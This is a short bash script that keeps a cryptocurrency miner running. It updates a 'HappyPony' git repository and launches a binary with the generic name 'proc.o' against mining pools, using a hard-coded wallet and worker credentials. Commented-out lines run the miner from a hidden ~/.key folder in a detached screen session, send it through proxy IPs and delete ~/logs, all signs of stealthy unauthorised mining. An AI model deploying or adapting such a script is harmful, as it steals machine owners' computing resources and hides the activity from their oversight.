#!/bin/bash
#if ! screen -list | grep -q "pty1"; then
#	screen -dmS pty1 ~/.key/proc.o -a m7mhash --proxy=http://45.6.216.79:80 -o stratum+tcp://coinsump.com:6033 -u 99eAamS3fcYvrxDJo7bVhswjpp2XmqazHh -p stats -e 50
#	rm -rf ~/logs/*
#fi
cd "$(dirname "$0")"
cd ~/HappyPony
git config user.email "bleh@bleh.com"
git config user.name "whoami"
git stash
git pull

PROCESS="proc.o"
RESULT=`pgrep ${PROCESS}`

if [ "${RESULT:-null}" = null ]; then
    echo "${PROCESS} not running, starting "$PROCANDARGS
    #~/HappyPony/proc.o -a m7mhash --proxy=http://92.52.160.50:8080  -o stratum+tcp://magi.trasmamod.com:3333 --user=mindamp.test --pass=test -e 50 &
    ~/HappyPony/proc.o -a m7mhash -o stratum+tcp://xmg.minerclaim.net:3333 --user=mindamp.test --pass=test -e 50 &

else
    echo "running"
fi

